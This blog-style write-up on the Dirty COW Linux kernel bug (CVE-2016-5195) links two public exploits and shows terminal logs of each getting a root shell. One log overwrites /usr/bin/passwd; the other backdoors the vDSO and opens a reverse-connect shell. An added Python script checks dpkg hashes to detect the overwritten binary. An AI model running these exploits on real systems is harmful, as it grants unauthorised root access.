【CVE-2016-5195】Dirtycow

  1. Overview
  2. EXP
    1. https://www.exploit-db.com/exploits/40616/
    2. https://github.com/scumjr/dirtycow-vdso

Overview

The recently disclosed Dirty COW. Affected versions: Linux kernel >= 2.6.22 (released in 2007; not fixed until October 18 this year). I tried the exploits available online and am recording the process here.

EXP

https://www.exploit-db.com/exploits/40616/

This exploit is the one from exploit-db, but it easily crashes the system; on success it returns a shell with root privileges.

okami@ubuntu14:~$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@ubuntu14:/home/okami# id
uid=0(root) gid=1000(okami) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(okami)
root@ubuntu14:/home/okami# whoami
root
root@ubuntu14:/home/okami#
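As an added defensive check (not part of the original post or of either exploit project): the log above shows the exploit replacing /usr/bin/passwd, and on Debian/Ubuntu the owning package's recorded file hashes let you detect exactly that kind of overwrite. The script below, written for this page, parses a dpkg-style md5sums manifest and reports modified or missing files. The sample tree it builds is constructed; the manifest path /var/lib/dpkg/info/passwd.md5sums named in the comments is the standard dpkg location for the `passwd` package.

```python
"""Integrity check for package-owned binaries against dpkg's md5sums.

On Debian/Ubuntu, dpkg records the expected MD5 of every installed file in
/var/lib/dpkg/info/<package>.md5sums ("<md5hex>  <relative path>" per line),
so a binary replaced by an exploit shows up as a hash mismatch, which is
also what `debsums -c` reports. The fixture below is a constructed sample
tree, not a real system.
"""
import hashlib
import os
import tempfile


def parse_md5sums(text):
    """Parse dpkg md5sums text into {relative_path: md5hex}."""
    expected = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        # dpkg separates digest and path with two spaces (md5sum(1) format)
        digest, _, rel = line.partition("  ")
        expected[rel.strip()] = digest.strip().lower()
    return expected


def md5_of_file(path):
    """MD5 of a file's contents, read in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_manifest(manifest_text, root="/"):
    """Compare every manifest entry with the file under `root`.

    Returns a sorted list of (relative_path, status) where status is
    "modified" (hash differs) or "missing" (file absent); an empty list
    means every listed file matches the package's record.
    """
    findings = []
    for rel, digest in parse_md5sums(manifest_text).items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            findings.append((rel, "missing"))
        elif md5_of_file(path) != digest:
            findings.append((rel, "modified"))
    return sorted(findings)


def build_fixture(tamper):
    """Constructed sample: a fake usr/bin/passwd plus its md5sums entry.

    With tamper=True the file is rewritten after the manifest was recorded,
    mirroring the "/usr/bin/passwd is overwritten" step in the log above.
    Returns (root_dir, manifest_text).
    """
    root = tempfile.mkdtemp(prefix="dirtycow-check-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    path = os.path.join(bindir, "passwd")
    with open(path, "wb") as f:
        f.write(b"\x7fELF original passwd contents (constructed)\n")
    manifest = f"{md5_of_file(path)}  usr/bin/passwd\n"
    if tamper:
        with open(path, "wb") as f:
            f.write(b"\x7fELF contents replaced by an exploit (constructed)\n")
    return root, manifest


if __name__ == "__main__":
    for tamper in (False, True):
        root, manifest = build_fixture(tamper)
        print("tampered" if tamper else "clean", "->", check_manifest(manifest, root))
    # On a real Debian/Ubuntu host the equivalent call is:
    #   check_manifest(open("/var/lib/dpkg/info/passwd.md5sums").read(), "/")
```

Run with no arguments it reports the clean fixture as empty and the tampered one as `[('usr/bin/passwd', 'modified')]`; pointed at the real manifest it gives the same answer as `debsums -c passwd`. Restoring the copy the exploit left in /tmp/bak brings the hash back in line, but reinstalling the package from a trusted mirror is the cleaner remedy once the kernel itself has been patched.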

https://github.com/scumjr/dirtycow-vdso

This exploit does not crash the system, but its author says it does not work on every Linux version. I tried it anyway, and Ubuntu 14, Ubuntu 16 and CentOS 7 all worked.

okami@ubuntu14:~$ ./0xdeadbeef
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
[*] enjoy!
[*] restore: patch 2/2
[*] vdso successfully restored
[*] restore: patch 1/2
[*] vdso successfully restored
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

Note that there is a step here, "waiting for reverse connect shell...", which takes a little time; once it succeeds you have a shell with root privileges.